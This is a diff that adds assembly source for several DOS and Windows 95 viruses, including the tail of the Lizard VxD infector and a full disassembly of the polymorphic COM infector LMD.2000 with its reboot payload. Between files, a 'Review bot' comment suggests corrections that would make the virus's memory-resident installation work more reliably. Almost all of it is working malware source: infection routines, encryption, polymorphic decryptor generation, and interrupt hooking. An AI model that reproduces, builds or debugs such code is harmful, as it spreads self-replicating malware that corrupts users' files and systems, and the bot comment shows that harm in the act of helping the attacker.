+jne cfile +cmp word ptr [header + 18h],40h ;win exe? +je cfile +mov al,[header + 12h] ;infected? +or al,al +jne cfile + +;save ss:sp +mov ax,word ptr [header + 0eh] +mov sseg,ax +mov ax,word ptr [header + 10h] +mov ssp,ax + +;save cs:ip +mov eax,dword ptr [header + 14h] +mov csip,eax + +mov ax,4202h ;eof +xor cx,cx +cwd +vxdint 21h + +;calc new cs:ip +mov cx,16 +div cx +sub ax,word ptr [header + 8] + +mov word ptr [header + 14h],dx +mov word ptr [header + 16h],ax + +add edx,vend ;calc stack + +mov word ptr [header + 0eh],ax +mov word ptr [header + 10h],dx + +;xor encryption +rdnm: +in al,40h +or al,al +je rdnm +mov [encval],al ;save random value + +mov edi,offset32 encstart +mov cx,esize +xl: +xor [edi],al +inc edi +loop xl + +;write virus +mov ah,40h +mov cx,vsize +mov edx,offset32 start +vxdint 21h + +;undo +mov al,[encval] +mov edi,offset32 encstart +mov cx,esize + +xll: +xor [edi],al +inc edi +loop xll + +mov ax,4202h ;eof +xor cx,cx +cwd +vxdint 21h + +mov cx,512 ;calc pages +div cx +or dx,dx +jz short np +inc ax +np: +mov word ptr [header + 4],ax +mov word ptr [header + 2],dx + +mov ax,4200h ;bof +xor cx,cx +cwd +vxdint 21h + +rnd: +in al,40h ;set infection flag +or al,al +je rnd +mov [header + 12h],al + +mov ah,40h ;write new header +mov cx,26 +lea edx,header +vxdint 21h + +cfile: +mov cl,byte ptr [ndta + 21] ;restore attribute +lea edx,[ndta + 1eh] +mov ax,4301h +vxdint 21h + +mov cx,word ptr [ndta + 22] ;restore time/date +mov dx,word ptr [ndta + 24] +mov ax,5701 +vxdint 21h + +mov ah,3eh ;close file +vxdint 21h +jmp fnext + +ecsit: +VMMcall End_Nest_Exec +Pop_Client_State + +prevhook: +stc +ret +EndProc int21h +;----------------------------------------------------------------------------- +BeginProc LZD_Control +Control_Dispatch Init_Complete,LZD_Device_Init +clc +ret +EndProc LZD_Control +wb db 13,10,'Lizard by Reptile/29A',0 +VxD_Locked_Code_Ends +End ;this is the end my only friend the end... 
+ +;---[RMLZD.ASM]--------------------------------------------------------------- + +;Lizard's real mode portion + +.286 + +vxdhsize equ 701 +vxddsize equ 81 +vxdcsize equ 880 +esize equ encend - encstart +rmsize equ rmend - rmstart + +.model tiny + +.code +org 100h +start: +rmstart: +;get delta +;----------------------------------------------------------------------------- +call $ + 3 +drazil: +pop si +sub si,offset drazil +push si +pop bp +;----------------------------------------------------------------------------- +push ds ;coz psp + +push cs +pop ds + +;decrypt it +db 176 ;mov al +encval db 0 +;----------------------------------------------------------------------------- +lea di,[bp + offset encstart] +mov cx,esize +xd: +jmp fj +fj2: +inc di +loop xd +jmp encstart +fj: +xor [di],al +jmp fj2 +;----------------------------------------------------------------------------- +encstart: +mov ax,3d00h ;try to open lzd.vxd in +lea dx,[bp + offset dropname1] ;c:\windows\system\iosubsys +int 21h +jnc cfile ;exit if already installed +mov ah,3ch ;install lzd.vxd +xor cx,cx +int 21h +jnc inst + +mov ax,3d00h ;try to open lzd.vxd in +lea dx,[bp + offset dropname2] ;c:\win95\system\iosubsys +int 21h +jnc cfile +mov ah,3ch +xor cx,cx +int 21h +jnc inst + +mov ax,3d00h ;try to open lzd.vxd in +lea dx,[bp + offset dropname3] ;c:\windows.000\system\iosubsys +int 21h +jnc cfile +mov ah,3ch +xor cx,cx +int 21h +jc exit + +inst: +xchg ax,bx + +mov ah,40h ;write the header +mov cx,vxdhsize +lea dx,[bp + offset vxdheader] +int 21h + +;write some zeros +mov cx,3400 +lzero: +push cx +mov ah,40h +mov cx,1 +lea dx,[bp + zero] +int 21h +pop cx +loop lzero + +mov ah,40h ;write the data +mov cx,vxddsize +lea dx,[bp + offset vxddata] +int 21h + +mov ah,40h ;write the rmcode +mov cx,rmsize +lea dx,[bp + offset rmstart] +int 21h + +;write some more zeros +mov cx,1732 +lzero2: +push cx +mov ah,40h +mov cx,1 +lea dx,[bp + zero] +int 21h +pop cx +loop lzero2 + +mov ah,40h ;write the code +mov 
cx,vxdcsize +lea dx,[bp + offset vxdcode] +int 21h + +cfile: +mov ah,3eh +int 21h + +;exe return +exit: +pop ax ;psp +add ax,11h +dec ax +add word ptr [bp + offset csip + 2],ax + +;stack +db 5 ;add ax +sseg dw 0fff0h ;test +mov ss,ax + +db 0bch ;mov sp +ssp dw 0fffeh + +db 0eah +csip dd 0fff00000h + +zero db 0 + +dropname1 db 'c:\windows\system\iosubsys\lzd.vxd',0 +dropname2 db 'c:\win95\system\iosubsys\lzd.vxd',0 +dropname3 db 'c:\windows.000\system\iosubsys\lzd.vxd',0 +rmend: +vxdheader db vxdhsize dup (?) +vxddata db vxddsize dup (?) +vxdcode db vxdcsize dup (?) +encend: +ends +end start + +;---[RMLZD.INC]--------------------------------------------------------------- + +;Modified db listing of rmlzd.com + +start: +db 0E8h, 000h, 000h, 05Eh, 081h, 0EEh, 003h, 001h +db 056h, 05Dh, 01Eh, 00Eh, 01Fh, 0B0h +;db 000h +encval db 0 +db 08Dh +db 0BEh, 021h, 001h, 0B9h, 08Eh, 007h, 0EBh, 005h +db 047h, 0E2h, 0FBh, 0EBh, 004h, 030h, 005h, 0EBh +db 0F7h +encstart: +db 0B8h, 000h, 03Dh, 08Dh, 096h, 0C6h, 001h +db 0CDh, 021h, 073h, 07Fh, 0B4h, 03Ch, 033h, 0C9h +db 0CDh, 021h, 073h, 026h, 0B8h, 000h, 03Dh, 08Dh +db 096h, 0E9h, 001h, 0CDh, 021h, 073h, 06Ch, 0B4h +db 03Ch, 033h, 0C9h, 0CDh, 021h, 073h, 013h, 0B8h +db 000h, 03Dh, 08Dh, 096h, 00Ah, 002h, 0CDh, 021h +db 073h, 059h, 0B4h, 03Ch, 033h, 0C9h, 0CDh, 021h +db 072h, 055h, 093h, 0B4h, 040h, 0B9h, 0BDh, 002h +db 08Dh, 096h, 031h, 002h, 0CDh, 021h, 0B9h, 048h +db 00Dh, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh +db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h +db 0B4h, 040h, 0B9h, 051h, 000h, 08Dh, 096h, 0EEh +db 004h, 0CDh, 021h, 0B4h, 040h, 0B9h, 031h, 001h +db 08Dh, 096h, 000h, 001h, 0CDh, 021h, 0B9h, 0C4h +db 006h, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh +db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h +db 0B4h, 040h, 0B9h, 070h, 003h, 08Dh, 096h, 03Fh +db 005h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h, 058h +db 005h, 011h, 000h, 048h, 001h, 086h, 0C3h, 001h +db005h +;db 0F0h, 0FFh +sseg dw 0fff0h ;not necessary +db 08Eh, 
0D0h, 0BCh +;db 0FEh, 0FFh +ssp dw 0fffeh +db0EAh +;db 000h, 000h, 0F0h, 0FFh +csip dd 0fff00000h +db 000h +;db 063h, 03Ah +;db05Ch, 077h, 069h, 06Eh, 064h, 06Fh, 077h, 073h +;db05Ch, 073h, 079h, 073h, 074h, 065h, 06Dh, 05Ch +;db069h, 06Fh, 073h, 075h, 062h, 073h, 079h, 073h +;db05Ch, 06Ch, 07Ah, 064h, 02Eh, 076h, 078h, 064h +;db000h, 063h, 03Ah, 05Ch, 077h, 069h, 06Eh, 039h +;db035h, 05Ch, 073h, 079h, 073h, 074h, 065h, 06Dh +;db05Ch, 069h, 06Fh, 073h, 075h, 062h, 073h, 079h +;db 073h, 05Ch, 06Ch, 07Ah, 064h, 02Eh, 076h, 078h +;db 064h, 000h, 063h, 03Ah, 05Ch, 077h, 069h, 06Eh +;db 064h, 06Fh, 077h, 073h, 02Eh, 030h, 030h, 030h +;db 05Ch, 073h, 079h, 073h, 074h, 065h, 06Dh, 05Ch +;db069h, 06Fh, 073h, 075h, 062h, 073h, 079h, 073h +;db05Ch, 06Ch, 07Ah, 064h, 02Eh, 076h, 078h, 064h +;db000h +dropname1 db 'c:\windows\system\iosubsys\lzd.vxd',0 +dropname2 db 'c:\win95\system\iosubsys\lzd.vxd',0 +dropname3 db 'c:\windows.000\system\iosubsys\lzd.vxd',0 +vxdheader db vxdhsize dup (?) +vxddata db vxddsize dup (?) +vxdcode db vxdcsize dup (?) 
+encend: +vend: + +;---[LZD.DEF]----------------------------------------------------------------- + +VXD LZD DYNAMIC +DESCRIPTION '' +SEGMENTS + _LPTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE + _LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE + _LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE + _TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE + _DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE + CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE + _TLS CLASS 'LCODE' PRELOAD NONDISCARDABLE + _BSS CLASS 'LCODE' PRELOAD NONDISCARDABLE + _ITEXT CLASS 'ICODE' DISCARDABLE + _IDATA CLASS 'ICODE' DISCARDABLE + _PTEXT CLASS 'PCODE' NONDISCARDABLE + _PDATA CLASS 'PDATA' NONDISCARDABLE SHARED + _STEXT CLASS 'SCODE' RESIDENT + _SDATA CLASS 'SCODE' RESIDENT + _DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING + _DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING + _DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING + _16ICODE CLASS '16ICODE' PRELOAD DISCARDABLE + _RCODE CLASS 'RCODE' + +EXPORTS + LZD_DDB @1 + +;---[MAKEFILE]---------------------------------------------------------------- + +NAME = lzd + +LINK = LINK + +ASM = ml +AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -c -Cx -Zm -DMASM6 -DDEBLEVEL=0 +ASMENV = ML +LFLAGS = /VXD /NOD + +.asm.obj: + set $(ASMENV)=$(AFLAGS) + $(ASM) -Fo$*.obj $< + +all : $(NAME).VXD + +OBJS = lzd.obj + +lzd.obj: lzd.asm + +$(NAME).VxD: $(NAME).def $(OBJS) + link @<<$(NAME).lnk +$(LFLAGS) +/OUT:$(NAME).VxD +/MAP:$(NAME).map +/DEF:$(NAME).def +$(OBJS) +<< + + @del *.exp>nul + @del *.lib>nul + @del *.map>nul + @del *.obj>nul +;... \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm b/MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm new file mode 100644 index 00000000..53e0ddde --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lmd-2000.asm 
@@ -0,0 +1,587 @@ +; LMD.2000 + +; Resident Polymorphic COM Infector +; Virus Reroutes Int 21h Handler through Int 84h and uses Int 84h for +; virus function calls. Int 21h Function 4Bh (Set Execution State) is hooked +; for infection routine. Virus prepends its body to files and writes 2000 +; original bytes to end of file. Polymorphic routine makes 128 random +; one byte instructions and then fills in crypt information. + +; Cleaning Instructions - Overwrite First 2000 Bytes with Last 2000 Bytes +; Detection - No scanners detect this beastie yet. + +; Research and Disassembly by PakiLad 05/03/97 + +p386n + + +seg000 segment byte public 'CODE' use16 + assume cs:seg000 + org 100h + assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing + +start: + db 128 dup (90h) ; Buffer For Cryptor +CryptedCode: + jmp VirusStart +OneByteTable db 26h ; SEGES + db 27h ; DAA + db 2Eh ; SEGCS + db 2Fh ; DAS + db 0FBh ; STI + db 37h ; AAA + db 3Eh ; SEGDS + db 3Fh ; AAS + db 40h ; INC AX + db 42h ; INC DX + db 46h ; INC SI + db 48h ; DEC AX + db 4Ah ; DEC DX + db 4Eh ; DEC SI + db 90h ; NOP + db 92h ; XCHG AX, DX +InfMarker db 'LMD' + +GetRand15 proc near + push cx + in ax, 40h ; Get Random Number + xchg ax, cx + +MakeRandLoop: + xor ax, cx + loop MakeRandLoop + xchg ax, cx + in ax, 40h ; Get Random Number + inc cx + xor ax, cx + and ax, 0Fh ; Number 0 - 15 + pop cx + retn +GetRand15 endp + +GetOneByteIns proc near + push di + mov di, offset OneByteTable + call GetRand15 + add di, ax + mov al, cs:[di] + pop di + retn +GetOneByteIns endp + +CopyOverVir proc near + push bx + push es + push ds + nop + push cs + pop es ; ES = CS + assume es:seg000 + mov di, offset Buffer+10h + mov si, offset start + 10h + mov cx, 2000 + rep movsb + push ds + pop ax + add ax, 126 + mov [RestoreSeg + 10h], ax + mov al, [LastByte + 10h] + push ax + push cs + mov ax, offset StoreLastByte + 10h + push ax + mov [LastByte + 10h], 0CBh + jmp near ptr JMPFarProg +CopyOverVir endp + + +StoreLastByte: + 
pop ax + pop ds + mov [LastByte + 10h], al + pop es + assume es:nothing + pop bx + retn + +CheckGeneration proc near + in al, 40h ; Get Random Number + cmp al, 240 ; Below 240? + jb RandBelow240 ; Yes? Then JMP. + call GenerateCryptor + call GenerateCryptor + push dx + db 8Dh, 16h, 88h, 02h ; (FIXUP) LEA DX, OFFSET FAKE4DOSGW + mov ah, 9 + int 21h ; Write Fake Message + pop dx + +RandBelow240: + retn +CheckGeneration endp + + +SetupInt84 proc near + push es + push bx + push di + xor ax, ax + mov di, 211h ; Offset of INT 84h + push ds + mov ds, ax ; DS points to IVT + assume ds:nothing + cmp word ptr [di], 0 ; Is Virus Installed? + jnz AlreadyInMem ; Yes? Then JMP. + mov ax, 3521h + int 21h ; Get Int 21h Vectors + dec di + mov ax, es + mov [di], bx ; Set New Int 84h Offset + inc di + inc di + mov [di], ax ; Set New Int 84h Segment + cmp ax, ax + +AlreadyInMem: + pop ds + assume ds:seg000 + pop di + pop bx + pop es + retn +SetupInt84 endp + +InstallVirus proc near + push si + push di + push bx + mov ax, 5803h + xor bx, bx + int 21h ; Get UMB Link Status + push es + push dx + mov ax, 3521h + int 21h ; Get Int 21h Vectors + mov ax, es + mov cs:Int21Ofs, bx + mov cs:Int21Seg, ax + push ds + push ds + pop ax + dec ax + mov ds, ax ; DS points to MCB + assume ds:nothing + sub word ptr ds:3, 272 ; Subtract 4352 Bytes + sub word ptr ds:12h, 272 ; Subtract 4352 Bytes From Next Seg + mov es, ds:12h ; ES points to Next Segment + xor di, di + xor si, si + mov cx, 2272 + rep movsb ; Copy Virus Into Memory + xor ax, ax + mov ds, ax ; DS points to IVT + assume ds:nothing + sub word ptr ds:413h, 5 ; Subtract 5k From System Memory + mov word ptr es:1, 0 ; Set New PSP Segment + mov word ptr es:3, 272 ; Allocate 4352 Bytes + push es + pop ds ; DS = ES + assume ds:seg000 + mov ax, 2521h + mov dx, offset NewInt21 + 10h + int 21h ; Set New Int 21h Vectors + pop ds + pop dx + pop es + pop bx + pop di + pop si + retn +InstallVirus endp + +FakeDOS4GW db 0Ah + db 'DOS/4GW Protected Mode 
Run-time Version 1.95',0Dh,0Ah + db 'Copyright (c) Rational Systems, Inc. 1990-1993',0Dh,0Ah + db 0Dh,0Ah,'$' +JMPFarProg db 0EAh +RestoreOfs dw 100h +RestoreSeg dw 0 + +RestoreRoutine: + rep movsb + pop di + pop si + pop cx + jmp short $+2 +FileSize dw 0 + +NewInt24: + mov al, 3 + iret + db 37h + +VirusStart: + call CheckGeneration + in al, 40h ; Get Random Number + cmp al, 16 ; Above 16? + ja NoPayload ; Yes? Then JMP. + mov ax, 11h + int 10h ; Set Video Mode 80x13 + mov ax, 0A000h + mov es, ax ; ES points to Video Memory + assume es:nothing + mov di, 3222h + mov si, offset Graphic + mov cx, 80 + +DisplayGraphic: + push cx + mov cx, 80 + +DisplayLine: + cmp cx, 69 + jb Below69 + mov al, [si] + inc si + mov es:[di], al + +Below69: + inc di + loop DisplayLine + pop cx + loop DisplayGraphic + mov ah, 9 + mov dx, offset LozMustDie + int 21h ; Write String + xor ax, ax + int 16h ; Wait For KeyPress + jmp near ptr Reboot +LozMustDie db 9,9,0Ah + db 9,0Ah + db 0Ah + db 0Ah + db 7,' Lozinsky MuST DiE!$' + +NoPayload: + xor ax, ax + call GenerateCryptor + call SetupInt84 + jnz RestoreProg + call InstallVirus + +RestoreProg: + mov si, offset start + mov di, 0FFFEh + xor dx, dx + push cx + push si + push di + push cs + pop es + assume es:seg000 + mov si, offset RestoreRoutine + mov di, 0F9h + mov cx, 7 + rep movsb ; Copy Restore Routine + mov si, [si] + mov di, offset start + add si, di + mov cx, 2000 + db 0E9h,069h,0FDh ; JMP To Restore Routine + +NewInt21: + cmp ax, 4B00h ; Set Execution State? + jz InfectFile ; Yes? Then JMP. 
+JMPFar21 db 0EAh +Int21Ofs dw 0 +Int21Seg dw 0 + +InfectFile: + pushf + push ax + push bx + push cx + push es + push si + push di + push dx + push ds + push cs + pop ds + mov dx, offset NewInt24 + 10h + mov ax, 2524h + int 84h ; Set New Int 24h + pop ds + pop dx + push dx + push ds + mov ax, 4300h + push ax + int 84h ; Get File Attributes + pop ax + inc ax + push ax + push cx + and cl, 0D8h + int 84h ; Clear File Attributes + jb FileProblems ; Problems? Then JMP. + mov ax, 3D02h + int 84h ; Open File + xchg ax, bx + mov ax, 5700h + int 84h ; Get File Date/Time + push cx + push dx + push cs + pop ds ; DS = CS + mov cx, 128 + mov dx, offset Buffer+10h + mov ah, 3Fh + int 84h ; Read In 128 Bytes + cmp cx, ax ; Read 128 ? + jnz RestoreTD ; No? Then JMP. + mov al, [Buffer+10h] + cmp al, 'M' ; EXE File? + jz RestoreTD ; Yes? Then JMP. + cmp al, 'Z' ; EXE File? + jz RestoreTD ; Yes? Then JMP. + call CheckForMark + jz RestoreTD ; Infected Already? Then JMP. + call DoInfect + call NotBigEnough + +RestoreTD: + pop dx + pop cx + mov ax, 5701h + int 84h ; Restore File Date/Time + mov ah, 3Eh + int 84h ; Close File + +FileProblems: + pop cx + pop ax + int 84h ; Restore File Attributes + pop ds + pop dx + pop di + pop si + pop es + assume es:nothing + pop cx + pop bx + pop ax + popf + jmp short near ptr JMPFar21 + +CheckForMark proc near + push di + push si + mov di, offset InfMarker + mov cx, 16 + +FindMark: + mov al, [di] + push cx + mov si, offset Buffer+10h + mov cx, 128 + +CheckForMarker: + mov ah, [si] + cmp al, ah + jz FoundMark + inc si + loop CheckForMarker + cmp ax, cx + pop cx + jmp short DoneWithMark + +FoundMark: + pop cx + inc di + loop FindMark + cmp ax, ax + +DoneWithMark: + pop si + pop di +CheckForMark endp + +NotBigEnough proc near + retn +NotBigEnough endp + +DoInfect proc near + mov cx, 1872 + mov dx, offset OrgProgram+10h + mov ah, 3Fh + int 84h ; Read In 1872 Bytes + cmp ax, cx ; Read 1872? + jnz NotBigEnough ; No? Then JMP. 
+ xor cx, cx + xor dx, dx + mov ax, 4202h + int 84h ; Move Pointer to End of File + jb NotBigEnough + cmp dx, 0 ; Over 64k? + jnz NotBigEnough ; Yes? Then JMP. + cmp ax, 2048 ; Under 2048 Bytes? + jb NotBigEnough ; Yes? Then JMP. + cmp ax, 60000 ; Over 60000 Bytes? + ja NotBigEnough ; Yes? Then JMP. + cmp Buffer+30h, 0 + jz NotBigEnough + mov [FileSize + 10h], ax + mov ah, 40h + mov dx, offset Buffer+10h + mov cx, 2000 + int 84h ; Write Original Bytes To End of File + jb NotBigEnough + call CopyOverVir + xor cx, cx + xor dx, dx + mov ax, 4200h + int 84h ; Move Pointer to Beginning + mov ah, 40h + mov dx, offset Buffer+10h + mov cx, 2000 + int 84h ; Write Virus to File + retn +DoInfect endp + +Graphic db 0, 30h, 0Bh dup(0), 20h, 2 dup(0), 1Ah, 0FBh, 0EBh, 9Fh, 90h, 4 dup(0) + db 20h, 2 dup(0), 47h, 2 dup(25h), 0FDh, 0AAh, 4 dup(0), 0E0h, 0, 7, 0FAh + db 12h, 92h, 22h, 54h, 80h, 3 dup(0), 0C0h, 0Ch, 4, 0, 0A8h, 4Ah, 94h + db 55h, 40h, 3 dup(0), 0C0h, 8, 0Dh, 5Ah, 45h, 2 dup(55h), 0AAh, 0A0h + db 3 dup(0), 0C0h, 0FBh, 0F2h, 4, 95h, 54h, 0AAh, 5Dh, 0A0h, 3 dup(0) + db 0DDh, 80h, 28h, 0A2h, 49h, 2 dup(55h), 2 dup(0AAh), 3 dup(0), 0D7h + db 0Ah, 2, 19h, 25h, 5Dh, 4Ah, 6Dh, 0A4h, 3 dup(0), 0E6h, 0, 0A8h, 84h + db 95h, 7Ah, 0AAh, 56h, 0D0h, 3 dup(0), 0C0h, 48h, 2, 59h, 52h, 8Bh, 55h + db 0BAh, 0AAh, 4 dup(0), 2, 90h, 4, 4Ah, 7Dh, 55h, 6Fh, 64h, 4 dup(0) + db 24h, 25h, 5Ah, 2 dup(0AAh), 0ABh, 0B5h, 0B0h, 4 dup(0), 3 dup(1), 2Ah + db 0D5h, 0AAh, 5Ah, 0AAh, 4 dup(0), 40h, 8, 99h, 55h, 5Ah, 0DAh, 0DBh + db 53h, 4 dup(0), 15h, 52h, 44h, 0AAh, 0ABh, 57h, 0AAh, 0A9h, 80h, 4 dup(0) + db 89h, 22h, 55h, 6Dh, 55h, 5Eh, 0AAh, 0C0h, 2 dup(0), 4, 42h, 24h, 99h + db 56h, 0B5h, 56h, 0EAh, 0D1h, 5 dup(0), 91h, 25h, 5Bh, 2 dup(0AAh), 0D5h + db 4Ah, 40h, 4 dup(0), 8, 81h, 2Ah, 0AAh, 95h, 2Eh, 0E9h, 4 dup(0), 1 + db 45h, 24h, 4, 56h, 0DAh, 0E9h, 54h, 80h, 2 dup(0), 8, 80h, 20h, 0, 21h + db 55h, 56h, 0DDh, 0B6h, 3 dup(0), 2, 8, 0Ah, 2 dup(0), 2Ah, 0BBh, 0AAh + db 0D4h, 80h, 4 dup(0), 40h, 44h, 
1, 9, 55h, 56h, 0AAh, 40h, 2 dup(0) + db 8, 5, 1, 0, 80h, 25h, 6Dh, 0BBh, 69h, 3 dup(0), 2, 0, 0Ch, 0A0h, 5 + db 6, 92h, 0C9h, 54h, 4 dup(0), 20h, 26h, 4, 0, 0A0h, 4Ah, 0D4h, 20h, 90h + db 2 dup(0), 4, 1, 19h, 61h, 0, 9, 24h, 6Bh, 55h, 1, 3 dup(0), 40h, 45h + db 4, 10h, 0C4h, 49h, 0A4h, 94h, 2Fh, 3 dup(0), 14h, 2Ah, 59h, 0, 20h + db 0E0h, 4Bh, 68h, 0A5h, 2 dup(0), 2 dup(1), 54h, 0A0h, 1, 48h, 2, 0AAh + db 0B4h, 32h, 3 dup(0), 20h, 0AAh, 5Ah, 90h, 24h, 5, 0B5h, 0A9h, 55h, 3 dup(0) + db 8Ah, 55h, 58h, 44h, 92h, 95h, 0AAh, 0A4h, 22h, 3 dup(0), 1, 6Ah, 26h + db 82h, 4Ch, 6Ah, 16h, 0B4h, 0D4h, 2 dup(0), 1, 55h, 0ADh, 9Ah, 51h, 20h + db 95h, 0EAh, 0AAh, 0B1h, 3 dup(0), 2, 0AAh, 0BDh, 2Ah, 54h, 56h, 2Ah + db 0A9h, 59h, 3 dup(0), 15h, 55h, 42h, 0A9h, 25h, 52h, 0D5h, 55h, 0EAh + db 3 dup(0), 49h, 6Dh, 5Dh, 4Ah, 94h, 0ADh, 2Ah, 49h, 34h, 3 dup(0), 25h + db 56h, 0A4h, 55h, 6Ah, 0D5h, 0A9h, 25h, 0ABh, 3 dup(0), 55h, 75h, 42h + db 0Bh, 0C5h, 2Ah, 0D4h, 92h, 0A0h, 2 dup(0), 1, 13h, 0ADh, 59h, 40h, 22h + db 0D5h, 42h, 0AAh, 47h, 3 dup(0), 4Ah, 0F6h, 0E4h, 2Ah, 95h, 5Ah, 94h + db 95h, 15h, 3 dup(0), 2Bh, 55h, 0BBh, 89h, 55h, 45h, 8Ah, 54h, 0ABh, 3 dup(0) + db 9, 2Ah, 86h, 0A4h, 25h, 55h, 51h, 55h, 17h, 3 dup(0), 2, 0, 3Bh, 2 dup(49h) + db 53h, 0A5h, 55h, 6Ah, 3 dup(0), 40h, 0Ah, 0DDh, 0A5h, 4, 0AAh, 55h, 54h + db 0AAh, 4 dup(0), 41h, 27h, 51h, 69h, 25h, 0CAh, 0A9h, 50h, 3 dup(0) + db 9, 2Ah, 0DAh, 0EAh, 0A4h, 0ABh, 12h, 40h, 5 dup(0), 4Ah, 5Fh, 54h, 52h + db 53h, 55h, 28h, 5 dup(0), 25h, 60h, 0AAh, 0A9h, 49h, 0D4h, 80h, 4 dup(0) + db 4, 0, 26h, 95h, 2Ah, 0AAh, 69h, 48h, 4 dup(0), 1, 41h, 2 dup(0), 0A9h + db 29h, 2 dup(24h), 4 dup(0), 10h, 15h, 2 dup(65h), 54h, 0A4h, 52h, 82h + db 4 dup(0), 2, 0AAh, 0A5h, 90h, 2 dup(0AAh), 29h, 15h, 4 dup(0), 10h + db 5, 5Ah, 6Ah, 0A1h, 25h, 52h, 51h, 0F8h, 3 dup(0), 1, 20h, 45h, 92h + db 54h, 92h, 0C4h, 0ABh, 8Fh, 3 dup(0), 8, 15h, 25h, 55h, 25h, 54h, 0A1h + db 25h, 80h, 3 dup(0), 5, 42h, 0A5h, 6Ah, 0A8h, 12h, 94h, 0A9h, 0C0h, 3 dup(0) + db 5, 
55h, 5Ah, 2 dup(0AAh), 0A4h, 4Ah, 0A9h, 0C0h, 3 dup(0), 11h, 55h + db 0A5h, 2 dup(0AAh), 49h, 0AAh, 0A3h, 0E0h, 3 dup(0), 4, 0AAh, 0A6h, 0B5h + db 55h, 23h, 0D5h, 55h, 0E0h, 3 dup(0), 2, 2Dh, 0BAh, 0AAh, 0A2h, 4Ah + db 54h, 0A3h, 0E0h, 3 dup(0), 8, 0A5h, 5Ah, 0A4h, 94h, 25h, 0AAh, 0ABh + db 0E0h, 3 dup(0), 1, 2Ah, 0A5h, 52h, 41h, 56h, 55h, 57h, 0F0h, 4 dup(0) + db 25h, 59h, 24h, 14h, 8Ah, 55h, 57h, 0F0h, 4 dup(0), 40h, 22h, 40h, 82h + db 5Dh, 0AAh, 0AFh, 0F8h, 4 dup(0), 9, 4, 10h, 11h, 6Ah, 55h, 5Fh, 0F8h + db 6 dup(0), 1, 4Ah, 0ADh, 0D5h, 3Fh, 0F8h, 6 dup(0), 4, 0AEh, 0AAh, 2Ah + db 0BFh, 0F8h, 6 dup(0), 15h, 2Ah, 0D5h, 0AAh, 7Fh, 0F8h, 5 dup(0), 20h + db 0A2h, 55h, 2Ah, 54h, 0FFh, 0F8h, 4 dup(0), 3, 0FCh, 49h, 2Ah, 0AAh + db 53h, 0FFh, 0F8h, 4 dup(0), 3, 0FEh, 92h, 91h, 55h, 0A3h, 0FFh, 0F8h + db 4 dup(0), 3, 0FFh, 48h, 4Dh, 4Ah, 4Fh, 0FFh, 0F8h, 4 dup(0), 3, 0FFh + db 0A5h, 25h, 55h, 9Bh, 0DDh, 18h, 4 dup(0), 3, 0FFh, 0D4h, 0AAh, 0A8h + db 7Bh, 0C9h, 68h, 4 dup(0), 3, 0FFh, 0FAh, 44h, 0A5h, 0FBh, 0C1h, 68h + db 4 dup(0), 3, 0FFh, 0FAh, 95h, 53h, 0FBh, 55h, 68h, 4 dup(0), 3, 2 dup(0FFh) + db 52h, 8Fh, 0F8h, 5Dh, 18h, 4 dup(0), 3, 2 dup(0FFh), 0A4h, 5Fh, 2 dup(0FFh) + db 0F8h, 0, 0Bh dup(0FFh) +Reboot db 0EAh ; Reboot Computer + dw 0 + dw 0FFFFh + +GenerateCryptor proc near + push di + push ds + push cs + pop ds + mov di, offset start + mov cx, 128 + push di + +FillWithOneByte: + call GetOneByteIns + mov [di], al + inc di + loop FillWithOneByte + pop di + call GetRand15 + add di, ax + mov byte ptr [di], 0BBh ; Store MOV BX Instruction + add di, 3 + call GetRand15 + add di, ax + mov word ptr [di], 0A8B9h ; Store MOV CX, Instruction + inc di + inc di + mov byte ptr [di], 3 ; Store Decrypt Size + inc di + call GetRand15 + add di, ax + mov word ptr [di], 80BFh ; Store MOV DI + inc di + inc di + mov byte ptr [di], 1 ; Store Offset of Crypted Code + inc di + call GetRand15 + add di, ax + push di + mov word ptr [di], 312Eh ; XOR [DI], + inc di + inc di + mov byte ptr 
[di], 1Dh ; BX + inc di + call GetRand15 + add di, ax + mov word ptr [di], 4747h ; INC SI/INC SI + inc di + inc di + mov byte ptr [di], 43h ; INC AX + inc di + call GetRand15 + add di, ax + mov byte ptr [di], 0E2h ; LOOP Instruction + pop ax + push di + sub di, ax + mov ax, 0FFFEh + sub ax, di + pop di + inc di + mov [di], al ; Loop Offset + pop ds + pop di + retn +GenerateCryptor endp + +Buffer db 0CDh, 20h, 125 dup (0) +LastByte db 0 +OrgProgram db 1872 dup (0) +seg000 ends + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.loader.asm b/MSDOS/Virus.MSDOS.Unknown.loader.asm new file mode 100644 index 00000000..eb315d86 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.loader.asm 
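Review bot: In InstallVirus the word written at `es:1` is the owner field of the freshly built MCB (the `rep movsb` copy starts at the program's own MCB, so `es:0` carries its 'M'/'Z' signature), and `mov word ptr es:1, 0` marks that block as free rather than owned; DOS can then hand the resident body at `es+1` to the next allocation while the hooked Int 21h still points into it. If a system-owned block was intended, `mov word ptr es:1, 8` is the conventional value. The size stored at `es:3` (272) also looks one paragraph larger than the region carved off, since those 272 paragraphs include the 16-byte MCB itself, so 271 would match; both readings should be confirmed against the original binary, as the disassembler's comment "Set New PSP Segment" suggests it interpreted the write differently.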
@@ -0,0 +1,111 @@
+ PAGE ,132
+VIRUS SEGMENT PARA PUBLIC 'CODE'
+ ASSUME CS:VIRUS,DS:VIRUS
+ call gyilk
+ int 20h
+ nop
+gyilk: push ax
+ push bx
+ push cx
+ push dx
+ push es
